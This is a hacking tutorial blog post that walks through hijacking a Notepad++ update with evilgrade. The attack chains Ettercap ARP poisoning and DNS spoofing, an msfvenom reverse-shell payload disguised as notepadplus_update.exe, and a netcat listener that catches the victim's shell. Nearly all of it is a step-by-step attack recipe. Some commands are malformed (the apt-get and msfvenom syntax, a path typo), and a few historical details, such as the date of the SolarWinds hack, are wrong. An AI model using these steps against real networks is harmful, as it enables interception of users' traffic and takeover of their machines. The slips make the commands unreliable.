MitM Attacks: Hijacking Software Updates Like SolarWinds with evilgrade

Hacking

Welcome back, my aspiring cyberwarriors!

In this tutorial, we will examine what happens if that update or upgrade is hijacked by a malicious entity. All of our systems, periodically download upgrades and updates trusting that these are coming from the software developer. What if they were not? What if these updates/upgrades were coming from a malicious source such as the SolarWinds hack of 2021?

In addition to the SolarWinds hack, one of the most famous cyber warfare attacks thus far, relied upon this weakness in our systems. The infamous Stuxnet worm relied upon the driver signature of Realtek and Jmicro to install updates directly into the kernel, unbeknownst to the user. As these were legitimate signatures, the system accepted them without question. Both of these are examples of the weakness of the digital certificate method of signing updates/upgrades, even under the best of circumstances.

In this tutorial, we will be using a piece of software known as evilgrade to hijack and upgrade/updates from a number of different pieces of software. Note that isr-evilgrade, as presently developed, is limited to a small number of software updates and upgrades.

One final note, this is a moderate to advanced hack. It requires significant system knowledge, hacking knowledge and patience. We will be using several hacking tools in tandem, including netcat, Metasploit, Ettercap and evilgrade.

Step #1: Open a Terminal and start evilgrade

isr-evilgrade was built into some of the earlier versions Kali, but is NOT included in some of the most recent versions. If your version does not include evilgrade, it is in the Kali repository, so you can download and install by entering;

kali > apt-get isr-evilgrade install

Once it has completed it download and install, simply enter;

kali > evilgrade

As you can see, evilgrade starts by loading all of its 63 modules. Each module represents a software application that evilgrade can hijack its updates/upgrades. To see all the modules, we can type;

kali > show modules

In this lesson, we will be hijacking the update to Notepad++, so we need to configure evilgrade to use that module.

evilgrade > configure notepadplus

Once we have loaded this module, let’s take a look at the options for this module.

kali > show options

Please note the VirtualHost line. We will be using that in our DNS setup to hijack the update.

Step #2: Generate Payload in Metasploit

In this case, we will be simply creating a payload (in Metasploit terms that is a malicious program that we place on the victim to give us control) to install it in place of the update. If you are unfamiliar with Metasploit, check out my Metasploit Basics series here at Hackers-Arise.

This command puts that payload into a Windows .exe file with the name notepadplus_update.exe. First, we need to create the directory to hold the file. Open a terminal and type;

kali > mkdir /root/evilgrade

Then type;

kali > msfvenom windows/shell_reverse_tcp LHOST 192.168.1.118 LPORT=6996 X > /root/evigrade/notepadplus_update.exe

For more on creating custom payloads using msfvenom, check out my article Metasploit Basics, Part 9:msfvenom for Custom Payloads.

Now that we have created the payload, we need to tell evilgrade where it is and to use it as the agent in this update.

evilgrade(notepadplus) > set agent /root/evilgrade/notepadplus_update.exe

Next , we start the server

evilgrade (notepadplus) > start

Step #3: Download and Install Notepad+

Now, let’s download and install Notepad++ . You can find it here.

When it done downloading and installed, it opens a screen like that below.

Step #4: Setting Up our MiTM

Now that we have evilgrade all set up, we need to set up our MiTM attack. We will be using Ettercap for this purpose. If you need help with Ettercap, go back and review this tutorial.

We will be using Ettercap to redirect DNS queries. The first step is to open the etter.dns file in Ettercap with the text editor of your choice, but I will be using Leafpad here. You can use any text editor that suits your needs.

kali > leafpad /etc/ettercap/etter.dns

In this text document, add the following line. Remember, this was the address of the VirtualHost that evilgrade gave us previously.

notepad-plus.sourceforge.net A 192.168.1.106

Now, let’s start Ettercap in graphical mode.

kali > ettercap -G

To get Ettercap started, Click Sniff –>Unified Sniffing

The next step is that we need to activate the dns_spoof plugin in Ettercap. Click on Plugins –>Manage Plugins –>dns_spoof

Next, Scan for hosts. Click Hosts –> scan hosts.

When Ettercap is done scanning for hosts, Click Hosts –> Hosts list. This will open a window like below. Your may have more or less hosts with different IP addresses.

Now, place ourselves between the router (192.168.1.103) selecting it as Target 1 and the victim (192.168.1.118), selecting it as Target 2. Your IP addresses may be different.

Next, we need to ARP poison to place ourselves in the middle. Click Mitm –> Arp poisoning

Select “Sniff Remote connections“.

Next, Click Start –> Start Sniffing

Step #5: Set Up a Netcat Listener

Now that we have ourselves between our victim and the router, all their traffic will be going through our system. Our next step, is to set up a netcat listener on our attack system. This will open a listener on a specific port to receive a connection from our victim machine. Remember that the payload we created was using our IP address and port 6996. The listener must use that same port number.

kali >nc -l -p 6996

Now, when the user opens Notepad++, they will be greeted with prompt like that below asking whether they want to download the updates.

When the user clicks, “Yes”, it will update from our server and place our agent into Notepad++ instead of the update. The payload we created will then connect back to our netcat listener opening a shell on the victim’s system!

Although this attack is limited to those software developers that do not use digital certificates for authentication, it should provide you with insights into one more way to compromise a system. As I stated above, this exact attack has been used with stolen certificates and with hash collisions of legitimate digital certificates by nation states.